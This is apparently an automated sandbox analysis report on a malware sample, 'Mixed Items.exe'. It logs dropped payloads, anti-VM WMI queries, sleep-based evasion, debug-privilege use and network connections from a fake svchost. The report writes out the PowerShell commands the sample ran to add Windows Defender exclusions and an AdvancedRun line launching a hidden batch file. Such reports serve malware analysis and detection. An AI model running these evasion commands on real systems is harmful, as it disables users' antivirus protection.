                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Yara detected Beds ObfuscatorShow sources
                        Source: Yara matchFile source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
                        Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: C:\Users\user\Desktop\Mixed Items.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeThread delayed: delay time: 300000
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1474
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 692
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 698
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 818
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 834
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 651
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWindow / User API: threadDelayed 1333
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6304Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6296Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\Desktop\Mixed Items.exe TID: 6272Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6984Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -14757395258967632s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3252Thread sleep count: 698 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 59 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492Thread sleep count: 818 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep time: -15679732462653109s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep count: 834 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep count: 51 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 68Thread sleep count: 651 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 3748Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6068Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 7116Thread sleep time: -140000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe TID: 6296Thread sleep time: -300000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420Thread sleep count: 91 > 30
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420Thread sleep time: -2730000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe TID: 2420Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 2208Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 3704Thread sleep count: 193 > 30
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe TID: 3704Thread sleep count: 1333 > 30
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeFile Volume queried: C:\ FullSizeInformation
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: svchost.exe, 00000006.00000002.524787300.000001FC10863000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                        Source: svchost.exe, 00000006.00000002.486898976.000001FC0B029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: svchost.exe, 00000012.00000002.487244262.0000028549869000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.535147129.0000000000C9B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 00000004.00000002.249976724.000002D794F40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: powershell.exe, 0000000A.00000002.528595657.000000000451C000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.518621152.0000000004BEC000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 30_2_04D077F0 LdrInitializeThunk,
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\Mixed Items.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeNetwork Connect: 104.21.31.39 80
                        Adds a directory exclusion to Windows DefenderShow sources
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeCode function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Mixed Items.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe' -Force
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\Desktop\Mixed Items.exe C:\Users\user\Desktop\Mixed Items.exe
                        Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /SpecialRun 4101d8 7032
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user\AppData\Local\Temp\hawkgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user\AppData\Local\Temp\Matiexgoods.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user\AppData\Local\Temp\origigoods20.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user\AppData\Local\Temp\origigoods40.exe' 0
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\Purchase Order.exe 'C:\Users\user\AppData\Local\Temp\Purchase Order.exe' 0
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeProcess created: unknown unknown
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeProcess created: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Users\user\Desktop\Mixed Items.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Mixed Items.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
